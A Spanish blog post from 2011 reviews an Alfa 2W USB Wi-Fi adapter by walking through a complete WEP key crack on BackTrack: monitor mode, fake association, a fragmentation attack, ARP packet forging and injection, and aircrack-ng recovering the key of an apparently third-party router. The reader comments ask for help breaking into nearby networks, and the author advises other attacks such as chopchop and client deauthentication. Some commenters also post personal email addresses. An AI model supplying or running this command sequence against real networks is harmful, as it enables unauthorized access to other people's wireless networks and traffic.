Seguridad y Redes

Tips, Video Tutoriales, Wifislax, VMware, Linux, GNS3, Eve-NG, CCNA, Cisco Routers, Switches

Alfa 2w Modo Monitor (AWUS036NH - rt2800usb)

By 12:06 , , , , , , , , ,

El alfa 2000mw soporta modo monitor en BackTrack 4 r2 sin instalar nada de nada, automáticamente la reconoce con el driver rt2800usb. El alfa 2w me llego ayer mismo, lo primero que hice es averiguar si soportaba modo monitor y como podrán ver en este post, si que soporta. En cuanto a inyección es brutal!!, arriba de los 500 datas por segundo.
root@bt:~# airmon-ng

Interface       Chipset         Driver

wlan0           Ralink RT2870/3070      rt2800usb - [phy0]

root@bt:~#
Iniciamos airmon-ng
root@bt:~# airmon-ng start wlan0

Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
6179    dhclient
6179    dhclient

Interface       Chipset         Driver

wlan0           Ralink RT2870/3070      rt2800usb - [phy0]
                        (monitor mode enabled on mon0)

root@bt:~#
Ahora lo tenemos en modo monitor, listo para empezar auditar!!
root@bt:~# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11bgn  ESSID:off/any
    Mode:Managed  Access Point: Not-Associated   Tx-Power=7 dBm
    Retry  long limit:7   RTS thr:off   Fragment thr:off
    Encryption key:off
    Power Management:on

mon0      IEEE 802.11bgn  Mode:Monitor  Tx-Power=7 dBm
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Power Management:off

root@bt:~#
Iniciamos airodump-ng para mirar un objetivo.
 CH  6 ][ Elapsed: 4 s ][ 2011-02-26 13:16

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

5C:4C:A9:XX:XX:XX   33        3        0    0  11  54e  WEP  WEP         GUSAB
5C:4C:A9:XX:XX:XX   33        4        0    0   1  54e  WEP  WEP         INFINITUMcb9
00:18:3F:XX:XX:XX    6        5        0    0   6  54 . WEP  WEP         2WIRE6743

BSSID              STATION            PWR   Rate    Lost  Packets  Probes
Una vez escogido el objetivo, lanzamos airodump-ng.
root@bt:~# airodump-ng --bssid 00:18:3F:XX:XX:XX -c 6 -w captura mon0
Lanzado airodump-ng, ahora toca asociarnos con el objetivo.
root@bt:~# aireplay-ng -e 2WIRE6743 -a 00:18:3F:XX:XX:XX -h 00:C0:CA:XX:XX:XX -1 0 mon0
13:19:11  Waiting for beacon frame (BSSID: 00:18:3F:XX:XX:XX) on channel 6

13:19:11  Sending Authentication Request (Open System) [ACK]
13:19:11  Authentication successful
13:19:11  Sending Association Request [ACK]
13:19:11  Association successful :-) (AID: 1)
Como puede ver, con el alfa 2w asocio a la primera y eso que el router estaba muy distante y con muchos obstáculos. Ahora solo lanzamos cualquier ataque con el areplay-ng, en mi caso lance el ataque de fragmentación (ataque 5).
root@bt:~# aireplay-ng -5 -b 00:18:3F:XX:XX:XX  -h 00:C0:CA:XX:XX:XX mon0

13:19:20  Waiting for beacon frame (BSSID: 00:18:3F:XX:XX:XX) on channel 6
13:19:20  Waiting for a data packet...

Size: 68, FromDS: 1, ToDS: 0 (WEP)

      BSSID  =  00:18:3F:XX:XX:XX
  Dest. MAC  =  FF:FF:FF:FF:FF:FF
 Source MAC  =  00:18:3F:XX:XX:XX

0x0000:  0842 3a01 ffff ffff ffff 0018 3f18 85c9  .B:.........?...
0x0010:  0018 3f18 85c9 6076 c7c0 3f00 3130 92ea  ..?...`v..?.10..
0x0020:  f56f eb33 e447 71e0 3365 0e61 e8f1 dd2a  .o.3.Gq.3e.a...*
0x0030:  1246 669b bf66 bd76 e9dd 234a b45d 9327  .Ff..f.v..#J.].'
0x0040:  4642 6ad2                                FBj.

Use this packet ? y

Saving chosen packet in replay_src-0226-131920.cap
13:19:22  Data packet found!
13:19:22  Sending fragmented packet
13:19:22  Got RELAYED packet!!
13:19:22  Trying to get 384 bytes of a keystream
13:19:22  Got RELAYED packet!!
13:19:22  Trying to get 1500 bytes of a keystream
13:19:22  Got RELAYED packet!!
Saving keystream in fragment-0226-131922.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
root@bt:~#
Y como pueden ver es totalmente soportado y la inyeccion es brutal!!. Una vez generado el archivo PRGA (del ingles “pseudo random generation algorithm” o algoritmo de generación seudo aleatoria) con extención ".xor", usaremos packetforge-ng para crear un paquete arp. Nuestro objetivo es que el punto de acceso reenvie continuamente el paquete arp inyectado. Cuando lo reenvie obtendremos un nuevo IV (vector de inicialización). Todos estos IVs los usaremos para obtener la clave WEP.
root@bt:~# packetforge-ng -0 -a 00:18:3F:XX:XX:XX -h 00:C0:CA:XX:XX:XX -k 255.255.255.255 -l 255.255.255.255 -y fragment-0226-131922.xor -w ARP
Wrote packet to: ARP
Inyección del paquete ARP con areplay-ng.
root@bt:~# aireplay-ng -2 -r ARP mon0
No source MAC (-h) specified. Using the device MAC (00:C0:CA:XX:XX:XX)

Size: 68, FromDS: 0, ToDS: 1 (WEP)

      BSSID  =  00:18:3F:XX:XX:XX
  Dest. MAC  =  FF:FF:FF:FF:FF:FF
 Source MAC  =  00:C0:CA:XX:XX:XX

0x0000:  0841 0201 0018 3f18 85c9 00c0 ca4a 8297  .A....?......J..
0x0010:  ffff ffff ffff 8001 c7c0 4300 1018 b7e1  ..........C.....
0x0020:  6cde c857 5ad1 d077 a046 b99e 35b7 98fa  l..WZ..w.F..5...
0x0030:  5f01 7c1c 5afb 7836 bc01 eaa3 f9f8 b69e  _.|.Z.x6........
0x0040:  02ca b6ee                                ....

Use this packet ? y

Saving chosen packet in replay_src-0226-131938.cap
You should also start airodump-ng to capture replies.
En el anterior paso habrán bien los ojos! y miren como inyecta el alfa 2000mw. Por ultimo lanzamos aircrack-ng para obtener la clave WEP.
root@bt:~# aircrack-ng captura-01.cap
Opening captura-01.cap
Read 106515 packets.

#  BSSID              ESSID                     Encryption

1  00:18:3F:XX:XX:XX  2WIRE6743                 WEP (32632 IVs)

Choosing first network as target.

Opening captura-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 32822 ivs.

                         Aircrack-ng 1.1 r1738


         [00:00:00] Tested 258 keys (got 32812 IVs)

KB    depth   byte(vote)
0   30/ 33   92(36096) 62(35840) 76(35840) 84(35840) BC(35840)
1    0/  1   02(47616) 6A(41216) E8(40704) 03(40192) D3(40192)
2    0/  4   95(44544) 9A(42496) 44(39936) 31(39680) 15(38912)
3    0/  2   92(45568) F4(40704) 05(40448) 86(40448) 35(39424)
4    0/  1   80(48896) 1E(40192) 7A(39936) 16(39424) 94(39424)

                 KEY FOUND! [ 76:02:95:92:80 ]
Decrypted correctly: 100%

root@bt:~#
Sin duda me sorprendi, ya que antes de comprar el alfa, donde quiera habia leido que no servia para auditoria, pero ya ven si que sirve. Ha sido mi mejor adquisicion, para mi es la mejor de todas, tengo otros tres dipositivos USB, el WifiSky, el Kasens G5000 y el dragon FL-2016G pero sin duda puedo decir que barre con las tres!

Saludos y ahora que me entreguen mi camara lestomare unas fotitos para compartirlo con todos y platicarles el precio y los detalles de esta nueva adquisición.

Update:
Por cierto ya estan las primeras imagenes de BackTrack 5 !!!

, , , , , , , , ,

About the Author

Hablaremos sobre redes, seguridad, Cisco IOS, Linux y emulacion de dispositivos en GNS3.

You Might Also Like

29 comentarios

  1. Anónimo23 de marzo de 2011, 0:27

    HEY MEN RECHIDO TU TUTO SOY DE COLOMBIA Y QUIERO COMPRARME UNA DE ESTAS ME LA ACONSEJAS OK SALUDOS
    ANDRES

    ResponderEliminar
  2. delfirosales23 de marzo de 2011, 14:58

    Sin duda que si, es un excelente dispositivo, te la recomiendo ampliamente. Saludos!.

    ResponderEliminar
  3. sparko4 de abril de 2011, 22:29

    hola..tengo un usb wifi de 2w marca wiflycity .. instalo backtrack 4 r2 en VmWare pero no me detecta mi usb wifi ..xq sera? me ayudas?

    ResponderEliminar
  4. delfirosales5 de abril de 2011, 17:16

    @sparko

    Sera porque no tendras activado el USB wifi para que lo detecte el VMware. Para hacer esto debes ir al Menu VM > Removable Devices > Tu tarjeta USB > Connect. Con esto es suficiente para que al inciar backtrack lo reconozca.

    Si por alguna razon sigue sin detectar el dispositivo Wifi revisa que el servicio "VMware USB Arbitration Services" este inciadio. Para ver si esta iniciado debes ir al panel de control > Herramientas administrativas > Servicios.

    ResponderEliminar
  5. sparko5 de abril de 2011, 22:58

    hola otra vez ..pues si eso era ..jeje ..bueno ahora loq pasa esq tengo varias señales wifi con cifrado wep ..pero la mayoria tienen el nombre en 2 silabas ej:
    roberto saldaña o sino cerrado con parentesis o separadas x guiones bajo ..q puedo hacer en estos casos ..yaq no se puedo generar trafico hay algun komando para este tipo de essid ?¿ gracias

    ResponderEliminar
  6. delfirosales5 de abril de 2011, 23:28

    @sparko
    Buenas.

    Para ese tipo de ESSID utiliza las comillas " "

    Ejemplo:
    ESSID = delfi rosales

    "delfi rosales"

    ResponderEliminar
  7. sparko5 de abril de 2011, 23:38

    ok ..ultima ..dime xq a algunas señales no dejan generar trafico ..? el data sube muy lento .. q puedo hacer q inyeccion me rekomiendad ..?

    ResponderEliminar
  8. delfirosales6 de abril de 2011, 0:36

    No hay problema, puedes preguntar las dudas que tu quieras,, si puedo ayudarte con mucho gusto lo are.

    En cuanto a los datas dependiendo del tipo que ataque que realices. También debes de saber si tu dispositivo USB soporta algunos ataques como el chopchop o el ataque de fragmentacion. Y creo que tu dispositivo (wiflycity) si soporta estos ataques ya que tiene un chipset rtl8187.

    Si soporta te recomiendo estos últimos ataques. Primero prueba con el ataque chopchop, si no genera nada de trafico puedes probar con el ataque 5 (fragmento) y seguro que en un par de minutos tienes la clave.

    Saludos.

    ResponderEliminar
  9. sparko6 de abril de 2011, 18:06

    hola... qtal ..mira yo tengo konocimientos basicos en el backtrack .. ahora uso el backtrack 4r2 ..en un makina virtual ..ahora kisiera saber si me puedes pasar un manual en pdf .. kon el chopchop o ataque 5 (fragmento) ..te agradeceria mucho amigo .. te dejo mi correo .. shaggy_1920@hotmail.com . salu2

    ResponderEliminar
  10. delfirosales6 de abril de 2011, 18:59

    Buenas.

    Este mismo post muestra el ataque de fragmentacion.

    Incluso hay un vídeo que publique en este post. http://delfirosales.blogspot.com/2011/02/video-auditoria-wifi-con-el-alfa-2000mw.html

    En el video se muestra el ataque de Fragmentacion, puedes seguirlo paso a paso.

    Para el ataque de Chopchop es el mismo proceso, solo cambia en el siguiente paso.
    root@bt:~# aireplay-ng -5 -b 00:18:3F:XX:XX:XX -h 00:C0:CA:XX:XX:XX mon0

    En lugar de -5 es -4 para el chopchop.

    Saludos.

    ResponderEliminar
  11. sparko6 de abril de 2011, 20:56

    ok .. en los tutos q veo en la mayoria veo q al escribir komandos al final termina con mon0 .. y xq no wlan0 ?¿

    ResponderEliminar
  12. delfirosales6 de abril de 2011, 21:25

    Bueno eso es porque al poner mi tarjeta en modo monitor con el airmon-ng me genera el mon0 (en ingles significa modo monitor).

    Esto dependiendo de la tarjeta que tengas, en algunos solo te lo deja en Wlan0 en algunos genera el mon0 dependiendo como te lo indique en la consola.

    Por ejemplo a la hora de poner la tarjeta en modo monitor con el comando airmon-ng start wlan0 te mostrara algo similar a esto.

    #airmon-ng start wlan0

    (monitor mode enabled on mon0)

    En este ejemplo wlan0 queda en modo managed y mon0 como lo indica la consola queda en modo monitor.

    Y para escuchar todo el trafico wireless la tarjeta debe estar en modo monitor.

    ResponderEliminar
  13. sparko7 de abril de 2011, 22:31

    Este comentario ha sido eliminado por el autor.

    ResponderEliminar
  14. sparko7 de abril de 2011, 22:34

    hola .como estas..pues lamentablemente ..no pude sacar la kontrase̱a a un se̱al ..no se asocia no sale autenticacion sucefull :) ..algo asi ..se keda saliendo autenticacion ---..etc etc .... pero ai se keda ...y nada :( .. puse las komillas komo me dijiste pero nada ..el essid es "roberto wifi" xq sera ..?
    ResponderEliminar
  15. delfirosales9 de abril de 2011, 21:18

    Hola sparko.

    El que no pueda asociarse al AP puede ser por varias razones. Ojala puedas poner aquí el resultado que te da en consola para poder ayudarte.

    ResponderEliminar
  16. dj carlangas12 de abril de 2011, 18:25

    hola delfi tengo una buena pregunta, tengo todo un dia queriendo deslaquear mi antena y no he podido no me puede fragmentar (saving keystream in fragment)y no puedo seguir mas adelante , si lee la antena y me da todo ,pero no me puede fragmentar, me da un error que el interface MAC no machea te agradeceria si me puedes ayudar y tambien te encargo si puedes hacer un titurial para bajar y copiar el back track 4 r2
    gracias quidate

    ResponderEliminar
  17. delfirosales13 de abril de 2011, 23:53

    Buenas dj carlangas.

    Cuando te refieres a que no pasas de "saving keystream in fragment" es cuando el ataque de fragmentacion a funcionado correctamente??

    Algo así:

    13:19:22 Data packet found!
    13:19:22 Sending fragmented packet
    13:19:22 Got RELAYED packet!!
    13:19:22 Trying to get 384 bytes of a keystream
    13:19:22 Got RELAYED packet!!
    13:19:22 Trying to get 1500 bytes of a keystream
    13:19:22 Got RELAYED packet!!
    Saving keystream in fragment-0226-131922.xor

    Si es parecido lo que te muestra en consola, significa que puedes seguir adelante ya que se ha generado correctamente el archivo PRGA con extencion ".xor" este archivo se necesita para seguir con el siguiente paso que es
    utilizar packetforge-ng para crear un paquete arp y así poder realizar la inyección de trafico con el areplay-ng.

    o que error te muestra?

    Lo de copiar backtrack te refieres a copiarlo en un CD/DVD ?

    Saludos.

    ResponderEliminar
  18. djcarlangas15 de abril de 2011, 9:42

    buenas delfi
    gracias por contestarme lo que quiero decirte es que no paso del paso #5 donde de esta fragmentando y solo se esta leyendo los (packets) y no me da (Saving keystream in fragment-0226-131922.xor) para poder seguir o le estoy poniendo mal las clave o el back track r2 no sirve, no se que hacer tengo 2 dias trabajando en esto y no me da por favor ayudame.
    gracias

    ResponderEliminar
  19. Anónimo19 de abril de 2011, 7:40

    hola yo acabo de comprar mi alfa 2000mw, tengo 2 preguntas, de donde saco -h ??? no encuentro mi mac y no agarra la fake.. y veo que tu antena te marca 7 dBm , la mia 6 dBm, mire un tutorial en youtube para subirla hasta 30 dBm pero no funciona.\\gracias//

    ResponderEliminar
  20. Anónimo20 de abril de 2011, 9:50

    hola delfi, a mi m pasa igual k djcarlangas me sale Read ... packets y de ahi no me pasa. Gracias espero tu respuesta

    ResponderEliminar
  21. djcarlangas2 de junio de 2011, 20:42

    delfi soy dj carlangas tengo mas de un mes y medio que no meas contestado la pregunta a sercas del alfa 2000 o es puro cuento todo es lo tuyo

    ResponderEliminar
  22. delfirosales8 de junio de 2011, 21:39

    @djcarlangas
    Puede ser por varias razones, puede que el punto de acceso no sea vulnerable a este ataque, por eso hay alternativas como el chopchop http://delfirosales.blogspot.com/2011/06/ataque-4-ataque-chopchop-attack-2.html

    ResponderEliminar
  23. delfirosales8 de junio de 2011, 21:42

    @Anónimo
    el -h se refiere a que tienes que especificar la direccion MAC de tu tarjeta y para esto solo teclea en consola el comando "ifconfig" y te mostrara las tarjetas con su respectiva direccion MAC.

    Lo de subir los dBm no sabria decirte como hacerlo, ya que no lo he intentado.

    saludos!

    ResponderEliminar
  24. delfirosales8 de junio de 2011, 21:45

    @djcarlangas
    No te molestes, ya te he contestado, puede ser por varias razon, que no lo estas aciendo bien, que el punto de acceso este muy lejos y que no llegue muy bien la señal, que el punto de acceso no sea vulnerable y otras razones, pero puedes probar con otros tipos de ataques y seguro que obtines la clave.

    Y como te lo mencione no te molestes, te vallas enfermar, elige la paz, aveces no tengo tiempo para contestar. Pero tarde o temprano es seguro :)

    Saludos!

    ResponderEliminar
  25. delfirosales8 de junio de 2011, 21:49

    @Anónimo

    Como le mencione a djcarlangas, es que puede ser por varias razon, puede que no lo estas aciendo bien, que el punto de acceso este muy lejos y que no llegue muy bien la señal, que el punto de acceso no sea vulnerable y otras razones, pero puedes probar con otros tipos de ataques como el chopchop http://delfirosales.blogspot.com/2011/06/ataque-4-ataque-chopchop-attack-2.html

    Desasociando a un cliente conectado al punto de acceso y asi obtener la clave http://delfirosales.blogspot.com/2011/04/video-cracking-wep-desasociando-un.html

    o utilizando el Ataque 1: Autenticación Falsa + el
    Ataque 3: Reinyección de una petición ARP (ARP-request) http://delfirosales.blogspot.com/2011/03/video-inyeccion-con-alfa-2000mw-en.html

    y seguro que obtines la clave :)
    saludos!!

    ResponderEliminar
  26. Elapower15 de julio de 2011, 5:20

    TENGO UN PROBLEMA, utilizo el mismo alfa que tu:

    Interface Chipset Driver

    wlan0 Ralink RT2870/3070 rt2800usb - [phy0]
    pero cuando ejecuto el comando airdump-ng me sale el siguiente error:
    ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211.
    alguna idea?

    ResponderEliminar
  27. Anónimo28 de agosto de 2011, 12:44

    mui buenas delfin sabes por que cuando Inicio airmon-ng
    no me funciona tengo un usb con el chips realik 3070 te agradeceria muncho que me alludaras gracias i un saludo dede murcia dejo mi correo por si me quereis ayudar solitario.soy@hotmail.com

    ResponderEliminar
  28. beto29 de agosto de 2011, 21:56

    quisiera saber si puedes deslaquear en el sistema WAP2 si puedes hechamela la mano
    gracias

    ResponderEliminar
  29. Anónimo11 de octubre de 2011, 14:42

    wewAyuda tengo un portátil HP pavilion DM4 y tiene una tarjeta de red incorporada marca Intel(R)Wifi link 1000 BGN y no la detecta los siguientes sistemas operativos para auditoria wireless wifiway/wifislax y Backtrack 5

    ... no se detecta ninguna red en modo wlan0 ni mon0

    ResponderEliminar